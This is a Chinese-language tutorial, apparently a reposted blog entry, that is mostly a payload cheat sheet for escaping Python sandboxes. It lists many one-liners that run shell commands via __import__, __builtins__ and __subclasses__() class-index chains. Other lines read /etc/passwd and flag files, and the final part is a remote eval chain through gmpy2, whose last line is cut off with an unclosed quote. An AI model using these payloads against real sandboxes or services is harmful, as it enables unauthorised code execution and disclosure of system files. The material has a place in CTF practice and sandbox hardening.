本文主要是介绍九、Python沙箱[执行命令、读取信息、代码任意执行],希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、执行命令
1.需要导入
os.system("ls") # 自动打印,返回值为0
os.popen("ls").read() # 不自动打印,返回值为执行命令的内容
commands.getstatusoutput("ls") # python2中可使用,返回值为执行命令的内容
commands.getoutput("ls")# python2中可使用,返回值为执行命令的内容
subprocess.call("ls", shell=True)# 自动打印,返回值为0
pty.spawn("ls") # 需要在Linux上才可使用,自动打印,返回值为0
platform.os.system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
pdb.os.system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
importlib.import_module("os").system("ls")# 需要在Linux上才可使用,自动打印,返回值为0
importlib.__import__("os").system("ls")#自动打印,返回值为0
imp.os.system("ls")#自动打印,返回值为0
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")# 具体python版本可以爆破python3.X自动打印,返回值为0
imp.sys.modules["os"].system("ls")#自动打印,返回值为0
sys.modules["os"].system("ls")#自动打印,返回值为02.无需导入
__import__("os").system("ls")#自动打印,返回值为0
__builtins__.__import__("os").system("ls")#自动打印,返回值为0
__builtins__.__dict__['__import__']("os").system("ls")#自动打印,返回值为0## 下面几个为__builtins__替换值到##结束【仅适用于Python3】
1. print.__self__.__import__("os").system("ls")
2. dir.__self__.__import__("os").system("ls")
3. globals.__self__.__import__("os").system("ls")
4. locals.__self__.__import__("os").system("ls")
5. len.__self__.__import__("os").system("ls")
6. __build_class__.__self__.__import__("os").system("ls")
7. # get_flag为函数名
def get_flag():pass
d = get_flag.__globals__['__builtins__'].__import__("os").system("ls")
## 结束## 下面几个为__builtins__替换值到##结束【仅适用于Python2】
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")
## 结束# 下面命令利用的是<class 'warnings.catch_warnings'>在python3.8位于146号位置,这个位置不固定python3.9位于140号位置,建议爆破
().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').system('ls')
## 使用__subclasses__()的不同姿势
1. "".__class__.__base__.__subclasses__()
2. [].__class__.__base__.__subclasses__()
3. {}.__class__.__base__.__subclasses__()
4. ().__class__.__base__.__subclasses__()
5. (1).__class__.__base__.__subclasses__()
6. bool.__class__.__base__.__subclasses__()
7. print.__class__.__base__.__subclasses__()
8. open.__class__.__base__.__subclasses__()
9. "".__class__.__bases__[0].__subclasses__()
10. "".__class__.__mro__[1].__subclasses__()
11. "".__getattribute__("__class__").mro()[1].__subclasses__()
12. "".__getattribute__("__class__").__base__.__subclasses__()
## 结束
二、读取信息
# 涉及到os
open("/etc/passwd").read()
# 这里__subclasses__()[40] 40这个位置注意点跟上面一样要各位注意不同版本python此值不一样,找类为<type 'file'>
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
__builtins__["open"]("/etc/passwd").read()
__import__('os').popen('cat /f*').read()
# 包括上面__builtins__平替开头的都可以
__builtins__.__import__("os").popen('cat /f*').read()
# __subclasses__平替都可以,注意146可能根据python版本不同而不同
().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').popen('cat /f*').read()
三、代码任意执行
解释:代码任意执行简而言之就是利用现有程序可调用的python库去执行一些危险的操作例如"".__class__.__base__.__subclasses__()打印里面的内容如下,里面有很多的危险类我们可以用来构造,例如().__class__.__bases__[0].__subclasses__()[146]()._module.__builtins__['__import__']('os').system('ls')其实就是用此方法构造来的
实践例子:
- 发现程序可以用gmpy2函数,先查看其下面可用的类
dir(gmpy2)
发现有__builtins__\
- 初步构造
gmpy2.__builtins__['__import__']('os').system('ls')
gmpy2.__builtins__['eval']('eval(request.args["1"])
这篇关于九、Python沙箱[执行命令、读取信息、代码任意执行]的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
